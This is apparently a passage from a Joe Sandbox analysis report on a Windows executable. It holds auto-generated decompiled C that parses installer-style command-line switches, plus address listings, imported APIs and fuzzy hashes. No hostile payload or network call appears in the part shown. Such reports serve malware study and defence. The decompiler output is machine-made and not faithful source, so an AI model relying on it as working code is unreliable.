                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                      														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                      														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                      														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                      														_t202 = _t38;
                                                                                                                                                                                                      														do {
                                                                                                                                                                                                      															_t101 =  *_t192;
                                                                                                                                                                                                      															_t192 = _t192 + 1;
                                                                                                                                                                                                      														} while (_t101 != 0);
                                                                                                                                                                                                      														if(_t192 == _t202) {
                                                                                                                                                                                                      															goto L49;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t202 =  &_v276;
                                                                                                                                                                                                      															_v276 = _t170;
                                                                                                                                                                                                      															if(E003E5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                      																goto L49;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                      																_t218 = 0x3e8b3e;
                                                                                                                                                                                                      																_t105 = _v276;
                                                                                                                                                                                                      																if(_t104 != 0x54) {
                                                                                                                                                                                                      																	_t218 = 0x3e8a3a;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      																E003E1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                      																_t202 = 0x104;
                                                                                                                                                                                                      																E003E658A(_t218, 0x104, 0x3e1140);
                                                                                                                                                                                                      																if(E003E31E0(_t218) != 0) {
                                                                                                                                                                                                      																	goto L50;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	goto L106;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t111 = _t100 - 0xa;
                                                                                                                                                                                                      													if(_t111 == 0) {
                                                                                                                                                                                                      														if(_v266 != 0) {
                                                                                                                                                                                                      															if(_v266 != 0x3a) {
                                                                                                                                                                                                      																goto L49;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t199 = _v265;
                                                                                                                                                                                                      																if(_t199 != 0) {
                                                                                                                                                                                                      																	_t219 =  &_v265;
                                                                                                                                                                                                      																	do {
                                                                                                                                                                                                      																		_t219 = _t219 + 1;
                                                                                                                                                                                                      																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                      																		if(_t115 == 0) {
                                                                                                                                                                                                      																			 *0x3e8a2c = 1;
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			_t200 = 2;
                                                                                                                                                                                                      																			_t119 = _t115 - _t200;
                                                                                                                                                                                                      																			if(_t119 == 0) {
                                                                                                                                                                                                      																				 *0x3e8a30 = 1;
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				if(_t119 == 0xf) {
                                                                                                                                                                                                      																					 *0x3e8a34 = 1;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t209 = 0;
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																		_t118 =  *_t219;
                                                                                                                                                                                                      																		_t199 = _t118;
                                                                                                                                                                                                      																	} while (_t118 != 0);
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															 *0x3e8a2c = 1;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L50;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t127 = _t111 - 3;
                                                                                                                                                                                                      														if(_t127 == 0) {
                                                                                                                                                                                                      															if(_v266 != 0) {
                                                                                                                                                                                                      																if(_v266 != 0x3a) {
                                                                                                                                                                                                      																	goto L49;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                      																	if(_t129 == 0x31) {
                                                                                                                                                                                                      																		goto L76;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		if(_t129 == 0x41) {
                                                                                                                                                                                                      																			goto L83;
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			if(_t129 == 0x55) {
                                                                                                                                                                                                      																				goto L76;
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				goto L49;
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																L76:
                                                                                                                                                                                                      																_push(2);
                                                                                                                                                                                                      																_pop(1);
                                                                                                                                                                                                      																L83:
                                                                                                                                                                                                      																 *0x3e8a38 = 1;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															goto L50;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t132 = _t127 - 1;
                                                                                                                                                                                                      															if(_t132 == 0) {
                                                                                                                                                                                                      																if(_v266 != 0) {
                                                                                                                                                                                                      																	if(_v266 != 0x3a) {
                                                                                                                                                                                                      																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                      																			goto L49;
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		_t201 = _v265;
                                                                                                                                                                                                      																		 *0x3e9a2c = 1;
                                                                                                                                                                                                      																		if(_t201 != 0) {
                                                                                                                                                                                                      																			_t220 =  &_v265;
                                                                                                                                                                                                      																			do {
                                                                                                                                                                                                      																				_t220 = _t220 + 1;
                                                                                                                                                                                                      																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                      																				if(_t142 == 0) {
                                                                                                                                                                                                      																					_t143 = 2;
                                                                                                                                                                                                      																					 *0x3e9a2c =  *0x3e9a2c | _t143;
                                                                                                                                                                                                      																					goto L70;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t145 = _t142 - 3;
                                                                                                                                                                                                      																					if(_t145 == 0) {
                                                                                                                                                                                                      																						 *0x3e8d48 =  *0x3e8d48 | 0x00000040;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						_t146 = _t145 - 5;
                                                                                                                                                                                                      																						if(_t146 == 0) {
                                                                                                                                                                                                      																							 *0x3e9a2c =  *0x3e9a2c & 0xfffffffd;
                                                                                                                                                                                                      																							goto L70;
                                                                                                                                                                                                      																						} else {
                                                                                                                                                                                                      																							_t147 = _t146 - 5;
                                                                                                                                                                                                      																							if(_t147 == 0) {
                                                                                                                                                                                                      																								 *0x3e9a2c =  *0x3e9a2c & 0xfffffffe;
                                                                                                                                                                                                      																								goto L70;
                                                                                                                                                                                                      																							} else {
                                                                                                                                                                                                      																								_t149 = _t147;
                                                                                                                                                                                                      																								if(_t149 == 0) {
                                                                                                                                                                                                      																									 *0x3e8d48 =  *0x3e8d48 | 0x00000080;
                                                                                                                                                                                                      																								} else {
                                                                                                                                                                                                      																									if(_t149 == 3) {
                                                                                                                                                                                                      																										 *0x3e9a2c =  *0x3e9a2c | 0x00000004;
                                                                                                                                                                                                      																										L70:
                                                                                                                                                                                                      																										 *0x3e8a28 = 1;
                                                                                                                                                                                                      																									} else {
                                                                                                                                                                                                      																										_t209 = 0;
                                                                                                                                                                                                      																									}
                                                                                                                                                                                                      																								}
                                                                                                                                                                                                      																							}
                                                                                                                                                                                                      																						}
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				_t144 =  *_t220;
                                                                                                                                                                                                      																				_t201 = _t144;
                                                                                                                                                                                                      																			} while (_t144 != 0);
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	 *0x3e9a2c = 3;
                                                                                                                                                                                                      																	 *0x3e8a28 = 1;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      																goto L50;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																if(_t132 == 0) {
                                                                                                                                                                                                      																	goto L98;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	L49:
                                                                                                                                                                                                      																	_t209 = 0;
                                                                                                                                                                                                      																	L50:
                                                                                                                                                                                                      																	_t173 = _v272;
                                                                                                                                                                                                      																	if( *_t173 != 0) {
                                                                                                                                                                                                      																		goto L2;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		break;
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L106;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										L34:
                                                                                                                                                                                                      										_t209 = 0;
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L131;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *0x3e8a2c != 0 &&  *0x3e8b3e == 0) {
                                                                                                                                                                                                      						if(GetModuleFileNameA( *0x3e9a3c, 0x3e8b3e, 0x104) == 0) {
                                                                                                                                                                                                      							_t209 = 0;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t202 = 0x5c;
                                                                                                                                                                                                      							 *((char*)(E003E66C8(0x3e8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = _t209;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L131:
                                                                                                                                                                                                      			}


































































                                                                                                                                                                                                      0x003e5c9e
                                                                                                                                                                                                      0x003e5ca9
                                                                                                                                                                                                      0x003e5cb0
                                                                                                                                                                                                      0x003e5cb3
                                                                                                                                                                                                      0x003e5cb6
                                                                                                                                                                                                      0x003e5cb7
                                                                                                                                                                                                      0x003e5cb8
                                                                                                                                                                                                      0x003e5cbd
                                                                                                                                                                                                      0x003e6204
                                                                                                                                                                                                      0x003e5ccb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5ccb
                                                                                                                                                                                                      0x003e5cd3
                                                                                                                                                                                                      0x003e5cd7
                                                                                                                                                                                                      0x003e5cf4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5cf4
                                                                                                                                                                                                      0x003e5cf8
                                                                                                                                                                                                      0x003e5d00
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d06
                                                                                                                                                                                                      0x003e5d06
                                                                                                                                                                                                      0x003e5d0e
                                                                                                                                                                                                      0x003e5d10
                                                                                                                                                                                                      0x003e5d12
                                                                                                                                                                                                      0x003e5d14
                                                                                                                                                                                                      0x003e5d15
                                                                                                                                                                                                      0x003e5d17
                                                                                                                                                                                                      0x003e5d49
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d19
                                                                                                                                                                                                      0x003e5d19
                                                                                                                                                                                                      0x003e5d1d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d3f
                                                                                                                                                                                                      0x003e5d3f
                                                                                                                                                                                                      0x003e5d4b
                                                                                                                                                                                                      0x003e5d4b
                                                                                                                                                                                                      0x003e5d4f
                                                                                                                                                                                                      0x003e5d8d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d93
                                                                                                                                                                                                      0x003e5d93
                                                                                                                                                                                                      0x003e5d9a
                                                                                                                                                                                                      0x003e5d9d
                                                                                                                                                                                                      0x003e5d9e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d9e
                                                                                                                                                                                                      0x003e5d51
                                                                                                                                                                                                      0x003e5d5b
                                                                                                                                                                                                      0x003e5d72
                                                                                                                                                                                                      0x003e60fb
                                                                                                                                                                                                      0x003e60fb
                                                                                                                                                                                                      0x003e6207
                                                                                                                                                                                                      0x003e620a
                                                                                                                                                                                                      0x003e620b
                                                                                                                                                                                                      0x003e620e
                                                                                                                                                                                                      0x003e6217
                                                                                                                                                                                                      0x003e5d78
                                                                                                                                                                                                      0x003e5d78
                                                                                                                                                                                                      0x003e5d80
                                                                                                                                                                                                      0x003e5d83
                                                                                                                                                                                                      0x003e5d84
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d84
                                                                                                                                                                                                      0x003e5d5d
                                                                                                                                                                                                      0x003e5d5f
                                                                                                                                                                                                      0x003e5d62
                                                                                                                                                                                                      0x003e5d68
                                                                                                                                                                                                      0x003e5d64
                                                                                                                                                                                                      0x003e5d64
                                                                                                                                                                                                      0x003e5d64
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d62
                                                                                                                                                                                                      0x003e5d5b
                                                                                                                                                                                                      0x003e5d4f
                                                                                                                                                                                                      0x003e5d1d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d9f
                                                                                                                                                                                                      0x003e5d9f
                                                                                                                                                                                                      0x003e5da5
                                                                                                                                                                                                      0x003e5dab
                                                                                                                                                                                                      0x003e5dba
                                                                                                                                                                                                      0x003e6218
                                                                                                                                                                                                      0x003e621d
                                                                                                                                                                                                      0x003e6220
                                                                                                                                                                                                      0x003e6221
                                                                                                                                                                                                      0x003e6229
                                                                                                                                                                                                      0x003e6230
                                                                                                                                                                                                      0x003e6247
                                                                                                                                                                                                      0x003e626a
                                                                                                                                                                                                      0x003e6272
                                                                                                                                                                                                      0x003e6249
                                                                                                                                                                                                      0x003e6255
                                                                                                                                                                                                      0x003e625f
                                                                                                                                                                                                      0x003e6264
                                                                                                                                                                                                      0x003e6264
                                                                                                                                                                                                      0x003e6284
                                                                                                                                                                                                      0x003e5dc0
                                                                                                                                                                                                      0x003e5dc0
                                                                                                                                                                                                      0x003e5dca
                                                                                                                                                                                                      0x003e5e22
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5dcc
                                                                                                                                                                                                      0x003e5dce
                                                                                                                                                                                                      0x003e5e24
                                                                                                                                                                                                      0x003e5e24
                                                                                                                                                                                                      0x003e5e2c
                                                                                                                                                                                                      0x003e5e47
                                                                                                                                                                                                      0x003e5e4a
                                                                                                                                                                                                      0x003e61d2
                                                                                                                                                                                                      0x003e61e2
                                                                                                                                                                                                      0x003e61e7
                                                                                                                                                                                                      0x003e61ee
                                                                                                                                                                                                      0x003e61f1
                                                                                                                                                                                                      0x003e61f1
                                                                                                                                                                                                      0x003e61f8
                                                                                                                                                                                                      0x003e61f8
                                                                                                                                                                                                      0x003e5e50
                                                                                                                                                                                                      0x003e5e53
                                                                                                                                                                                                      0x003e6109
                                                                                                                                                                                                      0x003e611f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6125
                                                                                                                                                                                                      0x003e6137
                                                                                                                                                                                                      0x003e613a
                                                                                                                                                                                                      0x003e613c
                                                                                                                                                                                                      0x003e613e
                                                                                                                                                                                                      0x003e613e
                                                                                                                                                                                                      0x003e6141
                                                                                                                                                                                                      0x003e6141
                                                                                                                                                                                                      0x003e6143
                                                                                                                                                                                                      0x003e6144
                                                                                                                                                                                                      0x003e614a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6150
                                                                                                                                                                                                      0x003e6152
                                                                                                                                                                                                      0x003e615c
                                                                                                                                                                                                      0x003e6170
                                                                                                                                                                                                      0x003e6172
                                                                                                                                                                                                      0x003e617c
                                                                                                                                                                                                      0x003e6190
                                                                                                                                                                                                      0x003e6190
                                                                                                                                                                                                      0x003e6196
                                                                                                                                                                                                      0x003e61a5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e61ab
                                                                                                                                                                                                      0x003e61b9
                                                                                                                                                                                                      0x003e61c6
                                                                                                                                                                                                      0x003e61c6
                                                                                                                                                                                                      0x003e617e
                                                                                                                                                                                                      0x003e6180
                                                                                                                                                                                                      0x003e618a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e618a
                                                                                                                                                                                                      0x003e615e
                                                                                                                                                                                                      0x003e6160
                                                                                                                                                                                                      0x003e616a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e616a
                                                                                                                                                                                                      0x003e615c
                                                                                                                                                                                                      0x003e614a
                                                                                                                                                                                                      0x003e610b
                                                                                                                                                                                                      0x003e610e
                                                                                                                                                                                                      0x003e610e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5e59
                                                                                                                                                                                                      0x003e5e59
                                                                                                                                                                                                      0x003e5e5c
                                                                                                                                                                                                      0x003e604f
                                                                                                                                                                                                      0x003e6056
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e605c
                                                                                                                                                                                                      0x003e606e
                                                                                                                                                                                                      0x003e6071
                                                                                                                                                                                                      0x003e6073
                                                                                                                                                                                                      0x003e6075
                                                                                                                                                                                                      0x003e6075
                                                                                                                                                                                                      0x003e6078
                                                                                                                                                                                                      0x003e6078
                                                                                                                                                                                                      0x003e607a
                                                                                                                                                                                                      0x003e607b
                                                                                                                                                                                                      0x003e6081
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6087
                                                                                                                                                                                                      0x003e6087
                                                                                                                                                                                                      0x003e608d
                                                                                                                                                                                                      0x003e609c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e60a2
                                                                                                                                                                                                      0x003e60aa
                                                                                                                                                                                                      0x003e60b2
                                                                                                                                                                                                      0x003e60b7
                                                                                                                                                                                                      0x003e60bd
                                                                                                                                                                                                      0x003e60bf
                                                                                                                                                                                                      0x003e60bf
                                                                                                                                                                                                      0x003e60d6
                                                                                                                                                                                                      0x003e60e0
                                                                                                                                                                                                      0x003e60e7
                                                                                                                                                                                                      0x003e60f5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e60f5
                                                                                                                                                                                                      0x003e609c
                                                                                                                                                                                                      0x003e6081
                                                                                                                                                                                                      0x003e5e62
                                                                                                                                                                                                      0x003e5e62
                                                                                                                                                                                                      0x003e5e65
                                                                                                                                                                                                      0x003e5fd3
                                                                                                                                                                                                      0x003e5fe9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5fef
                                                                                                                                                                                                      0x003e5fef
                                                                                                                                                                                                      0x003e5ff7
                                                                                                                                                                                                      0x003e5ffd
                                                                                                                                                                                                      0x003e6003
                                                                                                                                                                                                      0x003e6006
                                                                                                                                                                                                      0x003e6011
                                                                                                                                                                                                      0x003e6014
                                                                                                                                                                                                      0x003e603d
                                                                                                                                                                                                      0x003e6016
                                                                                                                                                                                                      0x003e6018
                                                                                                                                                                                                      0x003e6019
                                                                                                                                                                                                      0x003e601b
                                                                                                                                                                                                      0x003e6033
                                                                                                                                                                                                      0x003e601d
                                                                                                                                                                                                      0x003e6020
                                                                                                                                                                                                      0x003e6029
                                                                                                                                                                                                      0x003e6022
                                                                                                                                                                                                      0x003e6022
                                                                                                                                                                                                      0x003e6022
                                                                                                                                                                                                      0x003e6020
                                                                                                                                                                                                      0x003e601b
                                                                                                                                                                                                      0x003e6042
                                                                                                                                                                                                      0x003e6044
                                                                                                                                                                                                      0x003e6046
                                                                                                                                                                                                      0x003e604a
                                                                                                                                                                                                      0x003e5ff7
                                                                                                                                                                                                      0x003e5fd5
                                                                                                                                                                                                      0x003e5fd8
                                                                                                                                                                                                      0x003e5fd8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5e6b
                                                                                                                                                                                                      0x003e5e6b
                                                                                                                                                                                                      0x003e5e6e
                                                                                                                                                                                                      0x003e5f8b
                                                                                                                                                                                                      0x003e5f99
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5f9f
                                                                                                                                                                                                      0x003e5fa7
                                                                                                                                                                                                      0x003e5faf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5fb1
                                                                                                                                                                                                      0x003e5fb3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5fb5
                                                                                                                                                                                                      0x003e5fb7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5fb9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5fb9
                                                                                                                                                                                                      0x003e5fb7
                                                                                                                                                                                                      0x003e5fb3
                                                                                                                                                                                                      0x003e5faf
                                                                                                                                                                                                      0x003e5f8d
                                                                                                                                                                                                      0x003e5f8d
                                                                                                                                                                                                      0x003e5f8d
                                                                                                                                                                                                      0x003e5f8f
                                                                                                                                                                                                      0x003e5fc1
                                                                                                                                                                                                      0x003e5fc1
                                                                                                                                                                                                      0x003e5fc1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5e74
                                                                                                                                                                                                      0x003e5e74
                                                                                                                                                                                                      0x003e5e77
                                                                                                                                                                                                      0x003e5ea0
                                                                                                                                                                                                      0x003e5ebd
                                                                                                                                                                                                      0x003e5f79
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5f7f
                                                                                                                                                                                                      0x003e5ec3
                                                                                                                                                                                                      0x003e5ec3
                                                                                                                                                                                                      0x003e5ecc
                                                                                                                                                                                                      0x003e5ed4
                                                                                                                                                                                                      0x003e5ed6
                                                                                                                                                                                                      0x003e5edc
                                                                                                                                                                                                      0x003e5edf
                                                                                                                                                                                                      0x003e5eea
                                                                                                                                                                                                      0x003e5eed
                                                                                                                                                                                                      0x003e5f3f
                                                                                                                                                                                                      0x003e5f40
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5eef
                                                                                                                                                                                                      0x003e5eef
                                                                                                                                                                                                      0x003e5ef2
                                                                                                                                                                                                      0x003e5f34
                                                                                                                                                                                                      0x003e5ef4
                                                                                                                                                                                                      0x003e5ef4
                                                                                                                                                                                                      0x003e5ef7
                                                                                                                                                                                                      0x003e5f2b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5ef9
                                                                                                                                                                                                      0x003e5ef9
                                                                                                                                                                                                      0x003e5efc
                                                                                                                                                                                                      0x003e5f22
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5efe
                                                                                                                                                                                                      0x003e5eff
                                                                                                                                                                                                      0x003e5f02
                                                                                                                                                                                                      0x003e5f16
                                                                                                                                                                                                      0x003e5f04
                                                                                                                                                                                                      0x003e5f07
                                                                                                                                                                                                      0x003e5f0d
                                                                                                                                                                                                      0x003e5f46
                                                                                                                                                                                                      0x003e5f46
                                                                                                                                                                                                      0x003e5f09
                                                                                                                                                                                                      0x003e5f09
                                                                                                                                                                                                      0x003e5f09
                                                                                                                                                                                                      0x003e5f07
                                                                                                                                                                                                      0x003e5f02
                                                                                                                                                                                                      0x003e5efc
                                                                                                                                                                                                      0x003e5ef7
                                                                                                                                                                                                      0x003e5ef2
                                                                                                                                                                                                      0x003e5f4c
                                                                                                                                                                                                      0x003e5f4e
                                                                                                                                                                                                      0x003e5f50
                                                                                                                                                                                                      0x003e5f54
                                                                                                                                                                                                      0x003e5ed4
                                                                                                                                                                                                      0x003e5ea2
                                                                                                                                                                                                      0x003e5ea4
                                                                                                                                                                                                      0x003e5eaf
                                                                                                                                                                                                      0x003e5eaf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5e79
                                                                                                                                                                                                      0x003e5e7d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5e83
                                                                                                                                                                                                      0x003e5e83
                                                                                                                                                                                                      0x003e5e83
                                                                                                                                                                                                      0x003e5e85
                                                                                                                                                                                                      0x003e5e85
                                                                                                                                                                                                      0x003e5e8e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5e94
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5e94
                                                                                                                                                                                                      0x003e5e8e
                                                                                                                                                                                                      0x003e5e7d
                                                                                                                                                                                                      0x003e5e77
                                                                                                                                                                                                      0x003e5e6e
                                                                                                                                                                                                      0x003e5e65
                                                                                                                                                                                                      0x003e5e5c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5dd0
                                                                                                                                                                                                      0x003e5dd0
                                                                                                                                                                                                      0x003e5dd0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5dd0
                                                                                                                                                                                                      0x003e5dce
                                                                                                                                                                                                      0x003e5dca
                                                                                                                                                                                                      0x003e5dba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d00
                                                                                                                                                                                                      0x003e5dd9
                                                                                                                                                                                                      0x003e5e04
                                                                                                                                                                                                      0x003e61fe
                                                                                                                                                                                                      0x003e5e0a
                                                                                                                                                                                                      0x003e5e0c
                                                                                                                                                                                                      0x003e5e17
                                                                                                                                                                                                      0x003e5e17
                                                                                                                                                                                                      0x003e5e04
                                                                                                                                                                                                      0x003e6200
                                                                                                                                                                                                      0x003e6200
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharNextA.USER32(?,00000000,?,?), ref: 003E5CEE
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(003E8B3E,00000104,00000000,?,?), ref: 003E5DFC
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 003E5E3E
                                                                                                                                                                                                      • CharUpperA.USER32(-00000052), ref: 003E5EE1
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 003E5F6F
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 003E5FA7
                                                                                                                                                                                                      • CharUpperA.USER32(-0000004E), ref: 003E6008
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 003E60AA
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,003E1140,00000000,00000040,00000000), ref: 003E61F1
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 003E61F8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                      • String ID: "$"$:$RegServer
                                                                                                                                                                                                      • API String ID: 1203814774-25366791
                                                                                                                                                                                                      • Opcode ID: 4d8a5c123e619a78f1dd8d2c64480a7dbae24335865cafa5fcd3099d3af6d5da
                                                                                                                                                                                                      • Instruction ID: 58accc370bbe4b70010f4418d8508ac219bbeb8565e1d9f2ec7836c49d95fd53
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d8a5c123e619a78f1dd8d2c64480a7dbae24335865cafa5fcd3099d3af6d5da
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69D17071A08EF49FDF378B3B8C493FA37699B65348F1503A9D486DA5D1D6708E828B40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                                                                      			E003E1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				int _t28;
                                                                                                                                                                                                      				signed char _t30;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t41 = __esi;
                                                                                                                                                                                                      				_t38 = __edi;
                                                                                                                                                                                                      				_t30 = __ecx;
                                                                                                                                                                                                      				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                      						L14:
